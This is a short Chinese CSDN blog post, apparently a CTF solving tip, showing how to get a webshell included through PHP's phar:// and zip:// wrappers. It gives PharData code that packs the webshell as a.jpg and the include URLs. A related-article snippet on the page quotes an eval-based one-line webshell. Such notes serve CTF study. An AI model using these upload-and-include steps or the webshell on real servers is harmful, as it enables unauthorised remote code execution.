phar或zip协议文件包含

最新推荐文章于 2024-07-25 19:04:18 发布
最新推荐文章于 2024-07-25 19:04:18 发布
阅读量165 收藏
点赞数
文章标签: android studio android ide
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shao65308/article/details/134224969
版权

题目中只允许上传ZIP文件,适用此种解法

phar://

生成代码:

<?php
$p = new PharData(dirname(__FILE__).'/phartest.zip', 0,'phartest',Phar::ZIP) ; 
$x=file_get_contents('./php.php'); //要包含的文件,通常为webshell.php
$p->addFromString('a.jpg', $x); 
?>

会生成一个zip的压缩文件。然后我们构造

?file=phar://upload/phartest.zip/a.jpg

zip://

将webshell.php改名为a.jpg,用winrar进行压缩,注意压缩方式为“存储"

上传后进行文件包含:?file=zip://upload/a.zip%23a.jpg

shao65308
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
php文件上传+文件包含(phar协议)
WFC1006848997的博客
11-22 5296
test.bugku-web-upload—文件上传与文件包含组合 右键查看源码发现 继续查看源码,提示参数是file,还有一个upload.php 跟进upload.php,是个上传界面 那就可以猜测出是 文件上传与文件包含的组合,所以直接先使用伪协议查看源码,使用的是php://filter协议 php://filter/convert.base64-encode/resource= 首先读取include.php的源码 发现后缀多了一个.php,所以就不加.php了 base64解码 &l
zipphar文件包含
L1ni01
12-06 1965
zipphar文件包含 phar文件包含 phar协议要求:php大于5.3.0 需要将php.ini的参数phar.readonly设置为off 这个方法适用于验证包含文件为特定后缀时。 使用Phar://伪协议流可以Bypass一些上传的waf,大多数情况下和文件包含一起使用,就类似于我们的压缩包(其实就是一个压缩包),只不过我们换了一种方式去执行而已 本地测试: test.php <?php @eval($_POST["cmd"]);?> 然后将test.php压缩,将压缩文件改后缀为
PHP封装伪协议phar
m0_73720136的博客
05-08 312
通过本实验,利用PHP封装伪协议中的zip流,先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,绕过文件上传的限制,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传。使用phar流绝对路径和相对路径都可以。
phar / zip协议的应用wp
CHUNJIUJUN的博客
08-13 1689
查看源码 显示只能上传txt文件 上传一个txt文件试试 上传成功 这里我们退回主页面,发现有一个LFI here,意思是:这里是文件包含,点进去发现页面和源码什么都没有 退回主页面查看主页面源码,发现有提示 lfi.txt 我们将刚刚的 lfi.php 改成 lfi.txt 试一试,发现有内容,意思是给file传了一次参数,给file传的参数不能为空,无论file名是什么,都在file名后加一个 .php 后缀,注释的意思是值允许php文件包含 ...
文件包含技巧拓展】————2、zipphar协议包含文件
Fly_鹏程万里
01-30 3214
这个方法适用于验证包含文件为特定后缀时。 例如以下代码 &lt;?php $file = $_GET['file']; if(isset($file) &amp;&amp; strtolower(substr($file, -4)) == ".jpg"){ include($file); } ?&gt; &lt;?php $file = $_GET['file']; include($fi...
文件包含之——phar协议
abc18964814133的博客
05-09 6457
文件上传之phar协议
php-8.3.0-Win32-vs16-x64.zip
12-15
1. **phar.phar.bat**:这是一个批处理文件,用于执行PHAR(PHP Archive)文件PHAR是一种可以包含整个PHP应用程序或库的归档格式,包括PHP代码和其他资源。 2. **icudt72.dll**:这是国际部件库(ICU)的数据文件...
php-v7.4.33.zip
07-11
标题 "php-v7.4.33.zip" 暗示了这是一个包含 PHP(PHP: Hypertext Preprocessor)版本7.4.33的压缩文件。PHP是一种广泛使用的开源脚本语言,尤其适用于Web开发,可以嵌入到HTML中。这个特定的版本7.4.33是该软件的...
php-5.5.17-Win32-VC11-x64.zip
10-01
综上所述,这个PHP 5.5.17的zip文件包含了运行PHP所需的核心组件、PECL扩展以及用于Unicode、加密和拼写检查的库文件,适合在64位Windows系统上部署和使用PHP应用程序。用户在解压后需要将这些文件放置在正确的位置...
php-5.3.1-Win32-VC6-x86.zip
05-19
3. **icudt36.dll、icuuc36.dll、icuin36.dll**:这些是ICU(International Components for Unicode)库的动态链接库文件,用于提供Unicode支持,包括字符集转换、日期/时间格式化、数字格式化等功能。版本号36表示...
Cloudreve_v1.0.3云盘.zip
11-10
这个"Cloudreve_v1.0.3云盘.zip"文件是一个包含Cloudreve v1.0.3版本的源代码和相关配置文件的压缩包,适合在Linux环境下部署。 1. **Cloudreve介绍** Cloudreve致力于提供一个简单易用的Web界面,让用户可以方便...
Android Studio Build窗口出现中文乱码问题
nanke_yh的博客
07-24 368
Android Studio Build窗口出现中文乱码问题解决
【Android】广播机制
2301_79977698的博客
07-24 854
在Android中,广播(Broadcast)是一种消息,任何应用程序都可以发送广播消息,任何应用程序也都可以接收广播消息。广播通常用于通知应用程序某些事件的发生,比如系统启动、电量低、网络状态改变等。Broadcast Receiver(广播接收器):用于接收广播消息并响应这些消息的组件。Intent(意图):用于传递广播消息的数据结构。标准广播(Normal Broadcast)是完全异步的,所有接收器几乎同时接收广播,并且接收顺序是不确定的。
Unity Android接入SDK 遇到的问题
qq_37672438的博客
07-25 967
所以获取gradle.properties 文件的位置的时候,2019之后要返回上一级再获取,即:/Temp/ gradleout/unityLibrary/../gradle.properties。其实就是gradle版本太低了,升级下gradle,会自动的去升级kotlin,也就是升级Android studio或者idea。之后变成了/Temp/ gradleout/unityLibrary。下载jd_gui 工具 ,或者 idea 下载jd 插件,为/Temp/ gradleout。
Android笔试面试题AI答之Android系统与综合类(1)
学无止境,止于至善
07-25 939
答案仅供参考,来着文心一言、Kimi.ai。
DASCTF-BabyAndroid
Nike_name的博客
07-24 445
jpg隐藏解密函数,native层余弦变换什么什么的
android前台服务
最新发布
fumeidonga的博客
07-25 1032
关于作者:CSDN内容合伙人、技术专家, 从零开始做日活千万级APP。专注于分享各领域原创系列文章 ,擅长java后端、移动开发、商业变现、人工智能等,希望大家多多支持。未经允许不得转载。
Android APK混淆处理方案分析
qq_38794072的博客
07-24 893
提供apk给到外部,外部对apk进行二次处理后重新给我们一个新apk。尝试分析源apk文件和处理后的apk文件区别,根据其中区别推测外部的混淆处理方案,尽可能还原外部对apk的处理方式。以下对处理和未处理的apk文件用新、旧apk名称表示。通过反编译工具分析可以得出外部处理的新 app 操作主要是对 dex 文件增加了垃圾代码提高主包的相似度,避免被Google识别,然后进行了混淆处理。处理 dex 利用 BlackObfuscator-GUI 等工具处理后对 apk。
phar://伪协议
02-28
phar://伪协议是PHP中的一个特殊协议,用于访问和操作PHP归档文件(.phar文件)。.phar文件是一种将多个PHP文件打包成单个可执行文件的方式,类似于Java中的JAR文件或Python中的ZIP文件。 通过phar://伪协议,可以像操作普通文件一样对.phar文件进行读取、写入和执行等操作。使用该协议,可以方便地加载和使用.phar文件中的类、函数和资源。 以下是phar://伪协议的一些使用示例: 1. 读取.phar文件中的内容: ```php $content = file_get_contents('phar://path/to/file.phar/file.txt'); ``` 2. 执行.phar文件中的PHP脚本: ```php include 'phar://path/to/file.phar/script.php'; ``` 3. 写入内容到.phar文件中: ```php file_put_contents('phar://path/to/file.phar/newfile.txt', 'Hello, World!'); ``` 需要注意的是,为了安全起见,PHP默认情况下禁用了phar://伪协议。如果要使用该协议,需要在php.ini配置文件中启用相关选项或者在代码中使用ini_set函数进行设置。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值